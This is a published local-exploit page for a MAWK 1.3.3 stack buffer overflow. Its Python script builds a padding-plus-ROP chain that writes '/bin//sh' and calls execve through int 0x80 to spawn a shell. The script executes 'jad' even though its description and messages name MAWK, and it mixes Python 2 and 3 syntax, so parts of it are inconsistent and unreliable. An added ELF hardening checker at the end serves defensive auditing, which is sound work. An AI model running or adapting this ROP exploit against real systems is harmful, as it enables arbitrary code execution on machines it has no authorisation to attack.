MAWK 1.3.3-17 - Local Buffer Overflow
Source: http://exploitpack.com  Author: Sacco  Published: 2017-07-25

#!/usr/bin/python
# Developed using Exploit Pack - http://exploitpack.com - <jsacco@exploitpack.com>
# Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com
# Tested on: GNU/Linux - Kali 2017.1 Release
#
# Description: MAWK ( AWK Interpreter ) 1.3.3-17 and prior is prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate boundary-checks on user-supplied input.
#
# Program affected: mawk is an interpreter for the AWK Programming Language. The AWK language is useful
# for manipulation of data files, text retrieval and processing, and for prototyping and experimenting with algorithms.
#
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
import os, subprocess
from struct import pack

ropchain = "A"*1038 # junk
ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
ropchain += pack('<I', 0x0811abe0) # @ .data
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x0807b744) # pop eax ; ret
ropchain += '/bin'
ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
ropchain += pack('<I', 0x0811abe4) # @ .data + 4
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x0807b744) # pop eax ; ret
ropchain += '//sh'
ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
ropchain += pack('<I', 0x0811abe8) # @ .data + 8
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x080dcf4b) # pop ebx ; pop esi ; pop edi ; ret
ropchain += pack('<I', 0x0811abe0) # @ .data
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x08067b43) # pop ecx ; ret
ropchain += pack('<I', 0x0811abe8) # @ .data + 8
ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
ropchain += pack('<I', 0x0811abe8) # @ .data + 8
ropchain += pack('<I', 0x0811abe0) # padding without overwrite ebx
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080c861f) # int 0x80

try:
    print("[*] MAWK 1.3.3 Stack-Based Buffer Overflow by Juan Sacco")
    print("[*] Please wait.. running")
    subprocess.call(["jad", ropchain])
except OSError as e:
    if e.errno == os.errno.ENOENT:
        print "MAWK  not found!"
    else:
        print "Error executing exploit"
    raise
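
The chain above uses hardcoded gadget and .data addresses in the 0x08... range and runs no code from the stack, so it depends on the target loading at a fixed address, not on an executable stack. The following is an added example (Python 3, not part of the original exploit or of Exploit Pack) that reads the ELF headers to report those build properties; the function names and the sample images are constructed for illustration.

```python
import struct

PT_LOAD, PT_GNU_STACK, PT_GNU_RELRO = 1, 0x6474E551, 0x6474E552
ET_EXEC, ET_DYN, PF_X = 2, 3, 1

def elf_hardening(blob):
    """Report the ELF properties that decide whether hardcoded addresses stay valid."""
    if blob[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = blob[4] == 2                   # EI_CLASS: 1 = ELF32, 2 = ELF64
    end = "<" if blob[5] == 1 else ">"    # EI_DATA: 1 = little-endian
    e_type, = struct.unpack_from(end + "H", blob, 16)
    if is64:
        e_phoff, = struct.unpack_from(end + "Q", blob, 32)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", blob, 54)
    else:
        e_phoff, = struct.unpack_from(end + "I", blob, 28)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", blob, 42)
    # ET_DYN is treated as PIE (the usual heuristic; shared objects are ET_DYN too).
    # A missing PT_GNU_STACK header is reported as a non-enforced NX stack.
    report = {"pie": e_type == ET_DYN, "nx_stack": False, "relro": False, "load_base": None}
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, = struct.unpack_from(end + "I", blob, off)
        if is64:
            p_flags, = struct.unpack_from(end + "I", blob, off + 4)
            p_vaddr, = struct.unpack_from(end + "Q", blob, off + 16)
        else:
            p_vaddr, = struct.unpack_from(end + "I", blob, off + 8)
            p_flags, = struct.unpack_from(end + "I", blob, off + 24)
        if p_type == PT_GNU_STACK:
            report["nx_stack"] = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            report["relro"] = True
        elif p_type == PT_LOAD and report["load_base"] is None:
            report["load_base"] = p_vaddr
    return report

def sample_elf32(e_type, stack_flags, base):
    """Constructed 32-bit little-endian image: ELF header, one PT_LOAD, one PT_GNU_STACK."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", e_type, 3, 1, 0, 52, 0, 0, 52, 32, 2, 0, 0, 0)
    load = struct.pack("<8I", PT_LOAD, 0, base, base, 0, 0, 5, 0x1000)
    stack = struct.pack("<8I", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 0x10)
    return ehdr + load + stack

if __name__ == "__main__":
    print(elf_hardening(sample_elf32(ET_EXEC, 6, 0x08048000)))  # fixed-address build
    print(elf_hardening(sample_elf32(ET_DYN, 6, 0)))            # PIE build
```

To audit an installed binary, pass its bytes instead of the constructed sample, for example `elf_hardening(open(path, "rb").read())`. A report with `pie` false and a fixed `load_base` means a non-executable stack alone does not invalidate address-dependent chains of this kind.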


 